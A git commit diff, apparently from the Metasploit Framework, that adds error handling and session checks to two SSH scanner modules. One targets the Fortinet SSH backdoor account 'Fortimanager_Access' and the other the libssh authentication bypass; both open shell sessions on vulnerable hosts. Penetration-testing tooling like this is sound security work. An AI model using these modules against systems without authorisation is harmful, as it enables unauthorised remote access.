Update my SSH scanner modules

Especially with proper error handling for Net::SSH::CommandStream.
2018-12-12 15:36:32 -06:00 · 2018-12-12 15:36:32 -06:00 · 6e77ae7e3e
parent a415063acd
commit 6e77ae7e3e
2 changed files with 16 additions and 4 deletions
--- a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb
+++ b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb
@ -4,6 +4,7 @@
 ##

 class MetasploitModule < Msf::Auxiliary
+
  include Msf::Exploit::Remote::SSH
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::CommandShell
@ -81,15 +82,23 @@ class MetasploitModule < Msf::Auxiliary

    shell = Net::SSH::CommandStream.new(ssh)

-    return unless shell
+    # XXX: Wait for CommandStream to log a channel request failure
+    sleep 0.1

-    info = "Fortinet SSH Backdoor (#{version})"
+    if (e = shell.error)
+      print_error("#{ip}:#{rport} - #{e.class}: #{e.message}")
+      return
+    end
+
+    info = "#{self.name} (#{version})"

    ds_merge = {
      'USERNAME' => 'Fortimanager_Access'
    }

-    start_session(self, info, ds_merge, false, shell.lsock) if datastore['CreateSession']
+    if datastore['CreateSession']
+      start_session(self, info, ds_merge, false, shell.lsock)
+    end

    # XXX: Ruby segfaults if we don't remove the SSH socket
    remove_socket(ssh.transport.socket)
@ -98,4 +107,5 @@ class MetasploitModule < Msf::Auxiliary
  def rport
    datastore['RPORT']
  end
+
 end
--- a/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb
+++ b/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb
@ -137,7 +137,9 @@ class MetasploitModule < Msf::Auxiliary

    case action.name
    when 'Shell'
+      if datastore['CreateSession']
        start_session(self, "#{self.name} (#{version})", {}, false, shell.lsock)
+      end
    when 'Execute'
      output = shell.channel && (shell.channel[:data] || '').chomp